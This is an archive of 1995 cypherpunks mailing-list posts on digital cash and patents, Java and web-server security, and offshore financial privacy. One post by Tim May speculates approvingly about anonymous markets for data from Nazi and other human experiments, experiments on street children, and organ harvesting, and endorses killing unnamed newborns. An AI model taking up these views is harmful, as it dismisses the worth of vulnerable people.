To: cypherpunks@toad.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d02ac9e26d1b4f9@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Douglas Barnes <cman@communities.com> writes on cypherpunks:
>> I'm afraid you may have somewhat misunderstood the motivation behind
>> the Identity Agnostic paper. In no way is it intended as a way of
>> not facing the music wrt regulators in the country(s) where such an
>> institution has offices. The IA approach is intended as an possible
>> alternative for an institution that might otherwise license from
>> Chaum.
>
>So it's intended for avoiding patent issues only?

Yes, and not really so much because of price. I'm not the only person
who has found David hard to work with -- he has apparently decided to only
license "respectable" organizations that will not, in his eyes, make his
technology look "bad". I can tell you from painful, expensive experience
that a band of cypherpunks does not qualify as "respectable" in his eyes.
Alas for David, his technology is fundamentally cypherpunk -- there
is little motivation for a "respectable" institution to be the first
penguin on this stuff.

So, if you're a bank, licensing from David is cheap and relatively
painless, but there are powerful disincentives to deployment. Also,
assessing demand is problematic. For a small cypherpunk startup, the
demand is obvious, there are powerful incentives, but the cost of
licensing and David's reluctance to license a slightly wild-eyed
startup act as a barrier. There is certainly a middle ground, but
nobody seems to be stepping forward.

My understanding was that we were exploring the idea of a much smaller,
non-bank organization going into the digital cash business. Note that
while this is theoretically interesting to me, the fact that I'm talking
openly about this stuff is largely due to my decision _not_ to get
personally involved in this kind of venture except as a sidelines
cheerleader, or as an absolute last resort if nobody deploys.

Given that we're talking about a small, cypherpunk-motivated NBFI, I
think the IA stuff will work fine. It should be presented to the
regulators as if it were a fully-blinded system, since there won't
be any guarantee that blinding isn't occurring.

You raise the issue of using software not supplied by the "bank" --
if we're talking about a c'punks project, I'd assume you'd make the
full source code of the system available. The change of a client
from non-blinding to blinding would be about two lines of code.

You've also discussed the issue of commercial uptake -- as I see
it, one of the primary goals of a project like this would be to
provide incentive to deploy to the allegedly numerous Chaum licensees
that have not implemented a damned thing so far. And, with a nice
interface -- or at least the sort of generic GUI interface you can
get with Java -- it might do surprisingly well on its own merits.
Realistically, as soon as someone large comes along, you're likely
to get squashed. But it would be an interesting ride, and you might
just end up getting bought out instead of squashed.

As for a limit on transaction size, my understanding is that Mondex
is using $300 initially as a transaction limit. This certainly seems
reasonable, and it skates in underneath a lot of magic numbers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clifford Neuman <bcn@ISI.EDU>
Date: Sun, 8 Oct 95 18:12:38 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: anonymous cash without blinding
Message-ID: <199510090112.AA17509@darkstar.isi.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sun, 8 Oct 1995 14:20:27 -0700 (PDT)
   From: Wei Dai <weidai@eskimo.com>

   Now if the bank allows this exchange of old coins for new coins to be
   done over an anonymous network (e.g., a remailer-net), then the system is
   anonymous as long as you don't move physical money in or out of the system.
   Maintaining anonymity when moving physical money in and out of the system is
   what blinding helps you to do, but this will be less useful in a fully
   digital economy where such movement will be infrequent.
 
See:
 
  Gennady Medvinsky and B. Clifford Neuman.  NetCash: A design for
  practical electronic currency on the Internet.  In Proceedings
  of 1st the ACM Conference on Computer and Communication Security
  November 1993. 

For a discussion of the tradeoffs for this weaker form of anonymity.
You can find postscript for this paper as:
  ftp://prospero.isi.edu/pub/papers/security/netcash-cccs93.ps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 8 Oct 95 10:20:16 PDT
To: cypherpunks@toad.com
Subject: Nat Sec Eco Espo
Message-ID: <199510081720.SAA09282@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The anonymous post of the White House's National Security
Science and Technology Strategy recalls debate on this policy
underlying reports on CIA economic espionage:


Clinton instructs CIA to focus on trade espionage - report


Los Angeles, Jul 23 (Reuter) - President Clinton has ordered
the Central Intelligence Agency to make economic espionage a
top priority, according to a report in the Los Angeles Times
on Sunday.

The report quotes American intelligence sources who say the
CIA was instrumental in providing U.S. trade negotiators
information during heated auto trade talks with Japan this
spring, and has helped uncover bribes by rival nations
competing with U.S. firms for government contracts.

The sources say Clinton has issued a classified set of
intelligence priorities for the post Cold-War era, and that
the CIA is providing case officers with new training on
economic matters to meet the new challenge.

The recent trade talks with Japan were viewed as a success of
the new policy, according to the Times report. It said U.S.
Trade Representative Mickey Kantor was pleased with the CIA's
ability to report on the bargaining positions of American
rivals.

But the agency has reportedly been less willing to spy on
individual companies. In one recent success in that area the
CIA discovered that the French were offering bribes to
Brazilian officials to help telecommunications giant Thompson
win a government contract. The report says intelligence
information helped U.S.-based Raytheon Co. elbow out Thompson
of France to win the work.

But the problem in such work, say intelligence sources, is
determining which multinational corporations based in the
United States should be considered "American" firms deserving
assistance. Because of this confusion, CIA officials argue
they should be kept out of spy work targeting individual
foreign business at the behest of U.S. corporations.

Even so, the Times report says the intelligence community has
told Congress it can claim credit for uncovering bribes
affecting $30 billion in foregin contracts over the past few
years.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 10:22:42 PDT
To: cman@communities.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <18185.9510081722@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Douglas Barnes <cman@communities.com> writes on cypherpunks:
> I'm afraid you may have somewhat misunderstood the motivation behind
> the Identity Agnostic paper. In no way is it intended as a way of
> not facing the music wrt regulators in the country(s) where such an
> institution has offices. The IA approach is intended as an possible
> alternative for an institution that might otherwise license from
> Chaum.

So it's intended for avoiding patent issues only?

But the identity agnostic idea, and the idea of using software not
officially supplied by the bank does not sound like something that
would be easy to convince a bank, or other financial institution of?

I mean the agnostic server idea is that the user must obtain patent
infringing software in order to gain anonymity, or else the user
individually obtain on a case by case basis a license from Chaum.  A
similar mess to the early problem with PGP, back in the days when RSA
contended that PGP was a patent infringement, and the other side of
the story was that it was the users responsibility to get a license
from RSA.

As early versions of PGP demonstrated individuals can get away with
this kind of thing, but it doesn't help commercial uptake of the
software.  You need commercial uptake, as a lot of the shops will be
commercial service providers, plus value added information or product
providers.  What I'm saying is that whilst technically the server need
do nothing infringing, without the infringing client software it
provides nothing new over existing systems, and that the stigma of
illegality, might adversely affect the acceptability of the whole
scheme to a bank.

Ie if you really wanted to sell the system to a bank, you'd presumably
stand a better chance if you removed the potential for blinded
signatures altogether.

Tim is right, patents most definitely retard advancement of technology.

> The regulators I've discussed this with are primarily concerned with
> how money moves into and out of a digital cash system. The fact that
> small payments cannot be traced from buyer to seller is not at the
> top of their list of concerns -- it's already a basic fact of life
> for them in existing payment systems. 

So you think with the $10k limit, they might even be happy with a
system such as I just described?  (note: I did not imply anonymous
accounts, only payer anonymity, basically exactly what Chaum has in
his trial system right now).

> They are also not oblivious to the privacy concerns inherent in an
> institution logging massive amounts of counterparty data about
> small transactions.

I had not realised they were concerned over such things.  How does
this fit in with the separate 100$ bill for domestic and foreign use?
It was previously my suspicion, that 100$ bills were first, and that
soon they would be trying to outlaw cash altogether!

Perhaps I am too cynical, and I am glad to hear it.

(Anyone know if anything ever come of this creation of a foreign issue
of 100$ bills which had to be exchanged at customs in entry and exit,
each being legal tender only when used in the correct jurisdiction?)

> I would strongly discourage anyone from trying to set up a garage-
> type operation. While regulators clearly don't appreciate the
> subtleties of this stuff, they can spot an illegal bank or an
> unlicensed money transmitter from a mile away.

I was talking of doing it by the book, patent licenses, appropriate
banking licenses, banking regulatory approval.  Your description of
the banking regulatory bodies likely stance on transferring small
amounts anonymously was more favourable than I envisaged.

The garage-type operation: I was having problems convincing myself
that any bank could be persuaded to do it.  Hence I thought, well the
civilian sector would have to do it.  It doesn't have to be
amateurish, just has to be run by people who have an interest in
privacy, cypherpunks aren't excluded from doing things professionally,
and in fact have a vested interest in seeing it succeed even.  You
can't expect big banks, governments or corporate types to deliver
privacy on a plate, it is counter to their interests - they like
nicely indexed, cataloged user profiles, as they are saleable items.
Accurate user demographics is big business.

The closest that I've seen to a bank offering any semblance of
anonymity is Mondex, and it's a crock as far as privacy goes IMO, as
as far as I understand the card knows everything, and there is
*nothing* stopping the bank downloading *all* of that information next
time you plug the card in.  That's the kind of anonymity I was growing
used to seeing banks offer.  Also the fact that it relies purely on
the tamper resistance of the card isn't very inspiring, no
cryptographic protocols, just a counter buried in a tamper proof card.

> If your concern is creating account anonymity, then you're going to
> need to set up outside of the US.

That was not the immediate concern, only payer anonymity.  I thought
this would be too much to expect to get away with.  Your comments
backup that belief.

> Do be aware that even the more relaxed countries of the world have
> regulations that cover this sort of thing, and they are especially
> interested in making sure you at least pay the appropriate licensing
> fees.

Licensing fees for what?  I lack details, and insight into the
background of financial dealings (as you might have noticed:-), but my
outburst was prompted by impatience with the take up of DigiCash, or
any half decent alternative.  Blind signature technology has been
around for a long time now, and there is not one on-line instance of a
practical real world use of this technology.

So what problems remain to be solved with a system which has the
following characteristics:

1) either agnostic (to save $150k + 10% profits) or coughing up the
   $150k for Chaums patents - I'm not fussy, only concern for me is
   implications on uptake as described above

2) no anonymous accounts

3) payer anonymous

4) on-line, normal banking style records kept of money paid in

5) 100% real currency backed

6) profits by keeping interest on backed currency, possibly small % on
   cashing to pass on VISA costs, etc if necessary


Would US banking regulations in your opinion have a problem with this?

If $150k is the real sticking point then I'm surprised, I mean ok,
it's some money, perhaps the 10% cut of profits Chaum requires is more
of a concern.  But surely this would win as a privacy preserving
internet payment system for convenience, on-line instant payment.

With the kind of money investors seem to be willing to back netscape
with and the unexpectedly high level of interest in their commerce
servers, even Chaum's $150k seems like small change.  There must be
more to it, what a $1M lawyers bill to sort out the technicalities,
and legal implications with regulators?

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 8 Oct 95 15:23:10 PDT
To: cypherpunks@toad.com
Subject: Calming
Message-ID: <199510082223.SAA25223@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   PC Mag of Oct 24 odes Damien's mode, yodels out-of-tunely
   Netscape's sec, cites the sites of the SSL hacking axes,
   and declares that, whew, nervous darlings, all is lovely
   waltzing at crypto-crystal ball.

   Also casts doe eyes at STT and pre-lubed sheaths. It says
   the "National Security Administration" Rx's 40-56 itty-bit
   fits for muleing precious US fairy dust.

   Oilpalming the jittery globalists of squat fearing 
cleartext.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Sun, 8 Oct 95 16:04:13 PDT
To: Mike McNally <m5@dev.tivoli.com>
Subject: Re: subjective names and MITM
In-Reply-To: <9510061543.AA26079@alpha>
Message-ID: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Oct 1995, Mike McNally wrote:

> 
> hfinney@shell.portal.com writes:
>  > m5@dev.tivoli.com (Mike McNally) writes:
>  > >hfinney@shell.portal.com writes:
>  > > > There is a difference between a MITM and the case you describe ...
>  > 
>  > >Seems to me that the idea of "communicating with the person you think
>  > >you are" is intractably difficult if you're not sitting in the same
>  > >room. ...
>  >
>  > I can certainly agree with the attractive simplicity of this notion.  My
>  > point is that it is practically useless. ...
> 
> Oddly enough, it seems to me that Hal (if that really *is* his name)
> and I (and Carl & others) are saying basically the same things, but
> drawing completely different conclusions.  Strange.  I'm willing to
> wait to see what the peer review process concludes.

I think Hal and some other Cypherpunks (Me, You, Carl, etc.) are not 
proceeding from one of the same assumptions.  Specifically, Hal seems to 
be proceeding from the assumption that the person "on the other end of 
the line" is in fact a known physical entity who has a meat reputation 
tied to the name.  I'm proceeding from the assumption that the person on 
the other end of the line has no specific RL reputation that I'm basing 
the relationship on, just the online one.

Here's an example:
There's someone on the list, now, apparently, with the name of "Steven 
Levy."  Hal assumes that, when communicating with that "Steven Levy," one 
intends to communicate with the fairly-well-known journalist of that 
name, and thus  certification of RL identity is important.  I assume 
that, unless there's a specific reason otherwise, I want to have an 
intellectual conversation (or financial transaction, etc) that isn't 
predicated on this being "the" Steven Levy.  In that case, certification 
of RL identity is irrelevant.

(Not to pick on you, Steve, but I needed an obvious example familiar to 
list members... The other candidate was Steve Wozniak, to whom I sent fan 
e-mail the other day... :) )

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 8 Oct 95 16:49:11 PDT
To: cypherpunks@toad.com
Subject: Review: Assasins
In-Reply-To: <Pine.SUN.3.91.951008185136.29595B-100000@rwd.goucher.edu>
Message-ID: <Pine.SUN.3.91.951008192655.19552B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


Assassins with Sly Stallone and Antonio Banderas with Julianne Moore as 
the cyberspatial interest.

This may be the film derived in part from some writer-type's conversation 
with our own Tim May.

Sly and Antonio get their contracts via computer from an anonymous 
source.  They favor Powerbooks.  The source types on the tops of the 
screens they type on the bottom.  The Powerbooks must have built in 
wireless modems because they are pretty casual about firing them up 
wherever they happen to be.

Julianne is cute.  Apparently being a net security expert/hacker is seen 
as women's work in Hollywood with Sandra in the Net and what's her name 
in Hackers.  Also this sort of life interferes with your social contacts 
because both Sandra and Julianne seem lonely.  Julianne likes cats.

The screens look fake (like most Hollywood computer screens).  There is 
minor mention of encryption.  Julianne is a "ghost" (self-described) 
with no SS# or DL.  She does have a car and apartment, however.  As 
always in these films, much of the action is motivated by a single 
high-density floppy.  It's amazing the amount of stuff they can get on 
those disks.

Most of these character's problems could be solved if they would simply 
transfer this info over the nets without having to meet in person.  They 
could also encrypt disks much more than they choose to.

Coincidentally, I saw both The Net and Hackers this weekend.  It is hard 
to decide which is the "best."  Assassins is slick and Antonio makes a 
great psycho.  [Note to Sly --- Many of your problems as a professional 
assassin could be solved by a few finishing shots to the head. --- I 
thought they taught that on the first day in assassin's school.]  I 
suppose I liked Assassins best although Puerto Rico makes a poor stand-in 
for an island tax haven.  I like English accents on my tax 
haven bankers.


DCF

"Who is ready to act as an advisor for a small fee to anyone out there 
who wants to do a real net film." 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 11:54:05 PDT
To: cypherpunks@toad.com
Subject: (ecm) Chaum patent prices (was Re: cypherpunks digicash bank?)
Message-ID: <18305.9510081853@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[Marcel just posted this in the ecm list, I'm taking the liberty of
doing a Rob Hettinga and acting as human gateway between lists, as the
posts this was in response to were posted to both lists. -Adam]

Forwarded from the ecm@ai.mit.edu (Electronic Cash Market) mailing list:
>>>>>>>>>>>>

From: Marcel van der Peijl <bigmac@com.digicash>
To: ecm@edu.mit.ai
Subject: Chaum patent prices
Sender: bounce-ecm@edu.mit.ai
Precedence: bulk
Reply-To: Marcel van der Peijl <bigmac@com.digicash>

Hi,

I just want to make a quick comment on the prices that have been
floating around on this list ($150K +10%). No doubt this is what
David asked at some point to some individual but it is NOT the
'list price' -- there is no such thing as a list price. It all
depends on the application, business potential etc.

The up-front patent price should never be an obstacle for setting up
business. If you wanna do serious business, I suggest to give David
Chaum a call, or call Dan Eldridge. Phone numbers and email addresses
can be found on our web pages. You might be surprised.

And may I remind you that the patent price that is quoted is just
a tiny drop in the bucket compared to the kind of money spent on
marketing budgets for systems like Mondex!!! You are really talking
about a non-issue here, IMHO.

Marcel van der Peijl
DigiCash bv





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: schampeo@imonics.com (Steve Champeon (working from home))
Date: Sun, 8 Oct 95 16:51:07 PDT
To: Raph Levien <raph@cs.berkeley.edu>
Subject: Re: Netscape 2.0 beta
Message-ID: <v02120d03ac9e220fb628@[205.139.212.66]>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien wrote:

>* To send mail, Netscape apparently connects to the SMTP server
>  running on localhost. I haven't confirmed this. Thus, I don't
>  see any way to integrate Netscape and premail :-(. Guess I'll
>  just have to wait for Netscape script (from what I've seen so
>  far, it's not possible in pure Java).

You have to set this in the preferences dialog. The default
is localhost, assuming that your UNIX box is set up correctly
to send mail. I don't know about you guys, but my mailhost is
called 'mailhost'.

One thing that I found with the newsreader was that it doesn't
do POP correctly. No matter what you do with your mail, it still
doesn't check for read vs. unread articles. This is fine when you
have a mailbox with one message. It can be annoying when you have
110 messages in your mailbox and don't want to 1) delete them or
2) download them twice.

Not that I'm complaining. I'm still gigling from the introduction
of frames and client-side imagemaps (which also don't work on the
Solaris 2.4 version, running on Solaris 2.5beta/CDE)...

Steve

--
Steven Champeon                                (919) 469-7833
Technical Lead,                          schampeo@imonics.com
Imonics Web Services                    webmaster@imonics.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nahum.Goldmann@ARRAYdev.com (Nahum Goldmann)
Date: Sun, 8 Oct 95 16:54:50 PDT
To: www-buyinfo@allegra.att.com
Subject: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
Message-ID: <199510090009.UAA19196@array1.arraydev.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:
>...  For keys to be
>really global, there needs to be a mechanism in place for insuring
>that key ids are very probably unique.  

___________________________________________________________________

And Hal <hfinney@shell.portal.com>

>... The fact is, we live in a world populated by
>people and companies and we use names to identify them.  I will grant
>that there are problems with uniqueness but...
___________________________________________________________________

No problem.  The ultimate way to ensure that keys are globally unique is to
link them to the person's own genetic code.  Fingers they might cut, but...

Just imagine, in 1999+ every department store and a mall in the land will
provide a service of a quick DNA scan and key mapping.  Most likely they
will put the small scanning machine in the shoe repair section, to
substitute for the metal key cutting business.  You put your hair in and --
voila! -- the thing will insert your unique key in your own smart card.

For corporations they might require to keep in perpetuity a piece of a
founding CEO in a cookie jar.  The U.S. Government will have to unearth
again poor Ulysses S. Grant, this time with a far more valid reason. Or
perhaps Mr. Clinton would volunteer a donation in kind.

With so much of happy progress, one might like to puke...  Except, there is
too much genetic material there to incriminate you far beyond the reasonable
doubt.  Unless, of course, you can afford Mr. Cochrane as your attorney.
Being a Goldmann, the last thought really scares me.

Very best to all and sundry.
___________________________________________________________________

P.S. Scott Brickner <sjb@universe.digex.net> said:

>... Remembering
>that we're talking about a world that's sufficiently changed as to
>permit anonyms at all...

Right on!




Nahum Goldmann, ARRAY Development Inc., Ottawa, Canada  
Phone 613-733-0399, FAX 613-733-5691, email: Nahum.Goldmann@ARRAYdev.com>
Homepage: http://www.ARRAYdev.com/
N. Goldmann, Online Information Hunting - the first book for the end-user!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Oct 95 17:18:01 PDT
To: cypherpunks@toad.com
Subject: Java
Message-ID: <199510090017.UAA00652@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



As long as people are mentioning Java, I just want to make the
prediction, one more time, that at some point someone is going to find
some devistating security holes in HotJava.

In order for HotJava to be completely safe, the Java security model
needs to be perfect (and it is way too complex to prove correct), you
need a perfect implementation of this perfect security model, no code
in the Java implementation outside the security code can adversely
impact the function of the security code, and there has to be no way
that a bug in the code outside the Java implementation can screw with
the internals of the Java implementation in such a way as to get it to
drop its security.

I don't believe that humans can produce something that satisfies all
four criteria given our current state of technology. Java is just too
complex a language for me to believe that it can have been perfectly
specified and implemented.

Enormous risk -- I really mean ENORMOUS risk -- is being taken in
order to add a little convenience in making web applications pretty.
Someday, there is going to be big trouble from this. *BIG* trouble.

You heard it from me first.

You might ask "Perry, what could possibly satisfy your perfectionistic
criteria?" Well, a language that didn't have any I/O or similar
"dangerous" capabilities in it at all, rather than one in which such
capabilities were selectively "restricted", would be one I would feel
much more comfortable trusting. If written in a fairly safe language
where it is hard to pull buffer overflow tricks, the interpreter for
such a language would be very hard to pervert into doing untoward
things. Java isn't like that, though. Its got the full power and glory
of any other language, and the only thing sitting between a HotJava
app and some really nasty viral effect is a paper thin shield -- the
security model. A couple of bits twiddled in the right place and the
shield is gone.

The best things about Java could probably have been achieved without
giving it so much power. Its too late now, though. The bandwagon is
too far along. As a security consultant, I'm of course in a position
to profit from the wreckage, but frankly I don't like that any more
than an aircraft disaster expert wants to see more aircraft accidents.


Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 8 Oct 95 20:06:33 PDT
To: cypherpunks@toad.com
Subject: Crypto's Role in Evil?
Message-ID: <ac9dd5a302021004dfe5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Surely most of you know of my interest in enhancing liberty and freedom
through strong crypto. (The many newcomers to the list in the wake of the
Netscape news may not, but take my word for it...)

And I have clearly indicated that many of the implications of strong
crypto, anonymous remailers, untraceable digital money, data havens, and so
on, will severely undermine many programs that some people think are useful
and good. We avoid discussing these issues so as to avoid ideological flame
wars, but the effects are still there. In the view of some of us, strong
crypto and the swirl of ideas called "crypto anarchy" will mean that the
transactions people enter into are the ones they wish to enter into. No
more "affirmative action," no more transfer payments to the indigent and
lazy (or to anyone else, except by personal choice), no more quotas, no
more workplace rules (at least in cyberspace). Transnationalism, regulatory
arbitrage, etc.

(Granted, this Cyper-Millenium may not arrive by the time the real
millenium arrives, and the precise form is unclear. But there is little
doubt that the strong crypto most of us advocate will strongly advance the
"libertarian" agenda, and will have very negative effects on "traditional
liberalism" and law-based "social justice" policies. My personal view is
that an ever-shrinking elite (20%, then 10%, then 2%, ...) will dominate
high-value transactions, with the mass of humanity offering little or
nothing worth buying. Just my view.)

But Lucky Green has touched on some items I feel dutybound to comment on:

At 8:19 PM 10/8/95, Lucky Green wrote:

>Let me illustrate this with an example. During my visit to Dachau
>Concentration Camp, I saw original lab notebooks of experiments designed
>to increase the survial rate of pilots downed above the cold waters of the
>North Sea. A noble cause.
>
>The notebooks contained pages upon pages of tables listing survial times
>vs. water temperature, the data gained by dropping subjects into a tub
>containing water of a defined temperature.

There are places and countries which are attempting to outlaw the _use_ of
these Nazi medical experiments.

The implication: Nazi medical data will be one of the first sorts of
information to go into Cypherpunk data havens. Maybe not put there by
Lucky, maybe not even by me (though I see nothing wrong with using the
data...the Jews are dead, and not using the data does not bring them back,
so....).

People need to at least think about what our anonymous remailers and data
havens are likely to involve. Consider some entries:

- results of Japanese medical research on Chinese captives in Manchuria
(apparently the experiments were extensive, and American doctors gained
access after the war...the experiments gave us our first lead on biological
warfare, as the Japanese had exposed a lot of captives to various toxins
and biological agents)

- results of experiments on live subjects in Third World nations (right now
it is "uneconomical" to do much of this, because of the lack of a market
for the data)

- data on RU-486 abortifacients and similar drugs, and at least _some_
people think abortion is murder.

(I hold to the notion that a child can be killed up to the time he is
christened, or given a name. This gives from several days to several weeks
(or even longer, in some cultures) to decide if the newly-born organism is
actually human or not. This has no crypto relevance, except to indicate
that many of us hold views considered extreme to others....we're not all
just "Pro Choice" in the liberal sense.)

- better methods of killing people (not just the pseudo-science in the "How
to Kill People" sorts of books that Loompanics and Paladin sell, but a real
"information market")

- "How to Make Anthrax Bacillus in Your Basement," "Nuclear Triggers," etc.
In the next 10 years, expect a couple of "controversial" documents to
appear on anonymous sites. In the next 10 years after that, expect an
explosion of information. (I could be wrong...I'm trying not to sound
optimistic about it happening too soon.)


>I them saw more tables of the effects of various methods investigated to
>revive hypothermia victims who were near death. One of the treatments
>under investigation was dropping the patient into boiling water. Surely
>this type of research falls under the category of evil.

Does anyone have a URL for these results?

>Ponder this,

Indeed. And crypto anarchy will make this information liquid and widely
available, perhaps even stimulating the production of even more such data
by various means.

("Evil Hypothetical": The mostly-doomed orphaned street urchins of
Calcutta, Rio de Janeiro, and Mexico City are grabbed off the street,
subjected to various experiments, and the results sold on anonymous
information markets....I could even make a kind of argument that since
they're going to die anyone, why not get some useful data out of them. And
why not subject prisoners facing execution to various experiments? Yes,
both paths have problems. Doesn't mean someone won't meet market needs this
way, though.)

Oh, and did I mention the markets for organ transplants? Anonymous matching
of recipient needs could be done, with the only real world contact being
the arrangement for the patient to fly to a hospital in Burma or Singapore.
The harvesting of organs from the ultra-poor? (The topic of organ-legging
has been well-covered by dystopian SF, including works by Niven.
Information markets add a new and intriguing dimension.)

--Tim May, who will pay $35,000 for accurate mortality studies on at least
20 subjects of Iboviroxinase-D.


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 20:34:23 PDT
To: rjc@clark.net
Subject: Re: Two bugs in CERN3.0 HTTPD
Message-ID: <9510090330.AA02282@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



> From: Ray Cromwell <rjc@clark.net>
> 
> Suffice it to say, the CERN code is *littered* with temporary local
> stack arrays, and I'm guessing that many of them have faulty bounds
> checking (or none at all)
> 
> -Ray

Three cheers for C++ which let's us make types without these problems:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 8 Oct 95 20:40:48 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Announcing a New Offshore Financial Service (fwd)
Message-ID: <Pine.SUN.3.91.951008202849.2517A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

The ideas ARE getting out there.  I don't think I'll be availing
myself of the following services, but am forwarding this FYI.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Offshore Assets Reconciliation Limited
55 Frederick Street 
P.O. Box CB13039 
Nassau, Bahamas 
email:  71522.2715@compuserve.com 
phone: (809) 356-2093 
fax: (809) 356-2095.

 OAR is dedicated to providing financial privacy and the processing of
global financial transactions. OAR will provide for your secured online
financial transactions. Your financial transactions, instructions and data
are safe from prying eyes. OAR precludes having your private email read by
hackers and snoopers on the Internet.

 OAR is a pioneer in using the quality encryption technique, Pretty Good
Privacy (PGP)[tm], for the receipt of instructions and for providing
confirmation of transactions and status reports to our clients.  PGP is one
of the most popular worldwide encryption techniques and has not been
breached to our knowledge. Other systems (Netxxxx) have, on two occasions,
once in France and again in California, by student hackers.

 Using the Internet, OAR can accept PGP instructions from our clients and
to act upon them worldwide.  OAR is situated in Nassau, centrally located
for operating in the Caribbean and Central American but is also equipped to
function in over 20 international financial centres (Isle of Man, Bermuda,
Cook Islands, Vanuatu, etc.).

 We can execute you financial transactions, move cash from bank to bank,
from brokerage accounts to bank, attorney, escrow account, etc. You instruct
us by PGP as to what you need accomplished. We can also provide for pass
phrases in addition to PGP which some find absolutely crucial when handling
financial transactions on line.

 OAR is bonded.

 "If you need to send an international email message containing
confidential and sensitive financial information, use OAR." 


Schedule of fees:
1. Basic set-up charge of US$500.00, non-refundable.
2. Annual renewal fee of US$250.00, per year.
3. Transaction fee, US$50.00 per transaction, plus actual costs (wire
transfer fee, FedEx, DHL, UPS, etc.).  To be charged against your credit
balance which must be advanced, minimum of $100.
4. Optional mail fowarding service.  We will accept your international mail
and re-mail it with a U.S. postmark from locations in the U.S. US$240/year.
We will repackage you mail and pay for new postage.
 
APPLICATION TO OPEN AN OeAR ACCOUNT

Client's Name: 	______________________________________________

Mailing Address: 	______________________________________________

			______________________________________________

Telephone:		__________ ___________ ________________________

Fax:	_______________________ ___________________ _________________

Email:	___________________________ or ______________________________

Optional Passphrase, to be included in any message to us and if not
contained therein, we are authorised to ignore your instruction:

__________ None

Passphrase: ____________________________________________________________

________________________________________________________________________

NOTE: If no passphrase is specified above, then we then will asssume that
none is required by you.

PGP Public Key. Provide it on a 3 1/2 inch floppy disk (IBM format, only)
with your application or email the public key to the above email address.

Further terms:
1. Client understands that OAR will use selected banks of their choosing to
assist in your financial transactions. Any fees charged by said banks will
be charged to the client's advanced account balance. No interest will be
earned by you during the transit of your funds nor on you credit balance for
future costs.
2. OAR has the right to terminate your account where in their exclusive
discretion they do not believe that they can serve the client. Upon our
termination of an account, OAR will forward the account balance to the
client per the client's instructions.
3. Disclaimer: OAR accounts may not be utilised for money laundering,
criminal activities, racketeering, as defined in any country in which the
